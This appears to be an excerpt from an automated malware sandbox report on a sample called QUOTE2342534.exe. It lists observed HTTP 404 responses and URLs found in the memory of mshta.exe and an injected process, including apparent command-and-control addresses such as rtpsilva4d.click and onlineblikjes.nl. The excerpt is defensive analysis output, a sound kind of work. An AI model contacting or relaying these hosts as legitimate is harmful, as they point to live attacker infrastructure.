            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 13:18:03 GMTContent-Type: text/htmlContent-Length: 520Connection: closeETag: "6632e438-208"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 e9 94 9b e5 b1 be e5 81 8d e7 92 87 e9 94 8b e7 9c b0 e9 90 a8 e5 8b ac e6 9e 83 e6 b5 a0 e6 9c b5 e7 ac 89 e7 80 9b e6 a8 ba e6 b9 aa 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, 
user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 24 Oct 2024 13:18:06 GMT Content-Type: text/html Content-Length: 520 Connection: close ETag: "6632e438-208" Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 24 Oct 2024 13:18:09 GMT Content-Type: text/html Content-Length: 520 Connection: close ETag: "6632e438-208" Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 24 Oct 2024 13:18:11 GMT Content-Type: text/html Content-Length: 520 Connection: close ETag: "6632e438-208" Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:18:17 GMT Server: Apache X-Powered-By: PHP/8.2.23 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.coba168.info/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Ascii: 4000<!DOCTYPE html><html lang="th"><head><meta charset="UTF-8" /><me
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:18:20 GMT Server: Apache X-Powered-By: PHP/8.2.23 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.coba168.info/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Ascii: 4000<!DOCTYPE html><html lang="th"><head><meta charset="UTF-8" /><me
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:18:22 GMT Server: Apache X-Powered-By: PHP/8.2.23 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.coba168.info/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Ascii: 4000<!DOCTYPE html><html lang="th"><head><meta charset="UTF-8" /><me
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:18:25 GMT Server: Apache X-Powered-By: PHP/8.2.23 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.coba168.info/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Ascii: 4000<!DOCTYPE html><html lang="th"><head><meta charset="UTF-8" /><me
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:18:45 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:18:47 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:18:50 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:18:53 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:20:58 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:21:01 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:21:04 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:21:06 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: Tengine Date: Thu, 24 Oct 2024 13:21:15 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Thu, 24 Oct 2024 13:21:21 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
            Source: mshta.exe, 00000008.00000002.4595178953.0000000004466000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.0000000002DF6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
            Source: QUOTE2342534.exe, 00000000.00000002.2143831590.0000000002B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: QUOTE2342534.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.23.2
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor-pro/assets/css/widget-blockquote.min.css?ver=3.
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor-pro/assets/js/elements-handlers.min.js?ver=3.23
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.23.2
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/css/conditionals/e-swiper.min.css?ver=3.
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.24.7
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css?ver=3.24.7
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css?ver=3.24.3
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=3.24.7
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=3.24
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-text-editor.min.css?ver=3.24.
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.24.7
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.24.7
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.24.7
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/lib/animations/styles/bounce.min.css?ver
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.css?ver=5.15
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.css?ver
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.css?ver=5.15.
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elemento
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/header-footer-elementor/inc/js/frontend.js?ver=1.6.44
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver=
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/wp-staging/assets/js/dist/wpstg-blank-loader.min.js?ver=6
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/themes/hello-elementor/assets/js/hello-frontend.min.js?ver=3.1.1
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/themes/hello-elementor/header-footer.min.css?ver=3.1.1
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/themes/hello-elementor/style.min.css?ver=3.1.1
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/themes/hello-elementor/theme.min.css?ver=3.1.1
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/uploads/elementor/css/global.css?ver=1728530365
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/uploads/elementor/css/post-12.css?ver=1728540809
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/uploads/elementor/css/post-51.css?ver=1728540719
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/uploads/elementor/css/post-8.css?ver=1728530364
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-includes/js/dist/hooks.min.js?ver=2810c76e705dd1a53b18
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/xmlrpc.php
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4597123623.0000000004D3B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rtpsilva4d.click
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4597123623.0000000004D3B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rtpsilva4d.click/3x2e/
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://app.ddgame168.online/utm-source/coba168-info
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://line.me/R/ti/p/
            Source: mshta.exe, 00000008.00000002.4592995544.0000000002FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: mshta.exe, 00000008.00000002.4592995544.0000000002FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: mshta.exe, 00000008.00000002.4592995544.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.4592995544.0000000002FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: mshta.exe, 00000008.00000002.4592995544.0000000002FC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: mshta.exe, 00000008.00000002.4592995544.0000000002FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: mshta.exe, 00000008.00000002.4592995544.0000000002FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: mshta.exe, 00000008.00000003.2408754560.0000000008214000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: mshta.exe, 00000008.00000002.4595178953.00000000058D0000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.0000000004260000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://onlineblikjes.nl/?7Bohe=9B/xOqaHJLGzhK9
